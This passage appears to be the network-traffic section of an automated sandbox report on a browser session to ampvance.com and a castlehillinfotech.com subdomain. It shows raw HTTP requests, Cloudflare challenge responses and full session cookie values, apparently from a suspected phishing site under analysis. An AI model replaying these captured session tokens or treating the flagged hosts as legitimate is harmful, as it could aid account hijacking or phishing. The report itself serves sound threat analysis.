cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /boot/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2bf HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /js/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2c1 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /APP-3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee1/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee2 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: unknownDNS traffic detected: queries for: rfpcertstream.castlehillinfotech.com
          Source: unknownHTTP traffic detected: POST /report/v3?s=XceLM9%2F15QFyNV8EKMCmsRb2%2Fer2O9VN20vO500Khy7MY5nwL33D40mdULbbpHSMADWU1DQ6DoOuF%2FhlYEvM3ADJceuLowQQrxLvOJVZgbI6%2FuQ38D81pfFJlwIa1tk%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 427Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Mar 2024 13:24:31 GMTServer: ApacheContent-Length: 283Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:24:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16113Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: BlbXXsUZ79kFum+/bfgQoBuje9WUo1Rww4tXwqEhd28yfzbkdBKEP2GMguaiSzgZXxTdMSN28yqRN3sXX5nMw7zomWT3VXyxxcFzHvYuXrAiaeBx18CcM2BGTfsw13uJO671VCT4I/S37W3o18zRvA==$BXP99XJchwqQDqFA0JMp1g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:24:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16226Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: DXdJ7kKFaC8HJEymw3sls4TBUy3EKZNobC7ZwcKpomykMPojB3vV/g7A817Vgyhi+EaZc7xBEEmy8kka+9R1DOyo2vf3i7Pvn7ZKEk1ITV3jIy7hV52zV4OM6dnt5MElfmKmlwWCA5JExOVL56f0Bw==$ZCTTS72LO8Bko9DmAR72Dg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:24:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16247Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: KyFsquqtSWNs82QDNU8rM3cbTNjgWuW/6qSb3S0n3K5PS/gBJVdukcGz8ASrjO5D6xN4N3+zSGAmdA58Wx5u6zc2NvgCOSwJahq/F2frE7dEfmhPk6VMdvgG5TNcpXfxzKCpA4+vxbf8RAciafaHxw==$a1proFIkeyWGamPC2b+3NA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:25:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16332Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: RLezU/NWRXRBMSQxLb/PxI9JzSzbG/U4Q51udhzv3EPNAJpajI+tYNtYOUZgia6GoRlb78LpxdHhf06cTxcLYbZ51ZtwGbjgD0cKE9zGfXal4EOg9S29Qyb5mldcdlhiw65J3yzrv4ePmBWm0hh4DQ==$CDyCn0LJSngrpDjzGsLZZw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Mar 2024 13:25:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7b9iiJnvvBP2ZRgSSF%2BLzbwmUNbrI97iMSEBUMNayAJWzc0WwF717LY2zcVkqCxsLDsBsbh4Q4rU3gP5nWLq%2Bmuo4108dxyno2p39PIpYxdafXEXnh5fv4Rkumu9OPI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 85fa6e08aa6b423a-EWRalt-svc: h3=":443"; ma=86400
          Source: chromecache_84.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_84.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
          Source: chromecache_84.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
